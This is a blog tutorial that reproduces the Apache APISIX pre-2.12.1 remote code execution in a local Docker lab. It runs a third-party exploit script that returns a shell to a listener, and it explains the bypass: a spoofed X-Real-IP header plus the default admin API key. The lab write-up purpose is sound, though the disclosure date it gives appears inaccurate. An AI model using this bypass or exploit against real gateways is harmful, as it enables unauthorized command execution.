Exploiting the Apache APISIX < 2.12.1 RCE
Apache APISIX < 2.12.1 Remote Code Execution
What is Apache APISIX ?
Apache APISIX is a dynamic, real-time, high-performance API gateway. It provides traffic management features such as load balancing, dynamic upstream, authentication, canary release etc.
What is The Apache APISIX Vulnerability?
On June 16, 2021, Apache officially released a Remote Code Execution vulnerability in Apache APISIX version prior to 2.12.1 . An attacker can abuse the batch-requests plugin in APISIX to send requests to bypass the IP restriction which will result on bypassing whitelists and blacklists. If it uses default configuration, one can invoke the Admin API via the batch-request plugin enabling remote code execution.
1 - Setup the environment
Firstly, you have to download and install Apache APISIX on your local machine.
For that there are a couple of choices. You can use RPM Repository, Docker, Helm Chart, or source release package to install it.
For the sake of simplicity we are going to use docker.
1- Clone the git repo
1 | git clone https://github.com/apache/apisix-docker.git |
2- Edit the docker-compose.yml file to change verion from the :latest to a version that is prior to 2.12.1
1 | vim apisix-docker/example/docker-compose.yml |
3- You can now use docker-compose
1 | docker-compose -p docker-apisix up -d |
4- After this is done, I can access the API with a simple curl
1 | curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i |
> You can find the admin api key on the config.yaml file
5 - The Result
2 - The Exploitation
You can check & use this little python script already made by @VEN3XY on Exploit-DB
Download the scipt from his github repo : Apisix-Exploit.py
And run it :
you’ll need your Docker Interface IP, you can execute this command to get it easier.
1 | ip -4 addr show docker0 | grep -oP '(?<=inet\s)\d+(.\d+){3}' |
1 | python3 apisix-exploit.py http://127.0.0.1:9080/ 172.17.0.1 9999 |
After executing you’ll get a sheel as nobody
3 - The Explanation
1 - requests
Line 77 & Line 79, here you can see 2 requests are made to the API.
Looking at the json_data you can see the first request just plants the payload and the second one triggers it.
The response1 is planting, and response2 is triggering
2 - executing
From Line 61 & Line 75, we can see that it’s executing commands using os.execute.
And as exaplined above What is The Apache APISIX Vulnerability, this RCE vulnerability arises with being able to bypass IP restriction and the Admin API using the default configuration.
The IP restriction is bypassed by using X-Real-IP header setting to 127.0.0.1.
And setting X-API-KEY to the the default admin API token which is edd1c9f034335f136f87ad84b625c8f1
After running the exploit, if we look at the routes with the API, we see a new route is added.
1 | curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1'|jq |
4 - Mitigation
An already patched version (2.12.1) of APISIX is released. Users can simply upgrade to the unaffected version.
References
© 2022 - Sofiane Hamlaooui - Making the world a better place 🌎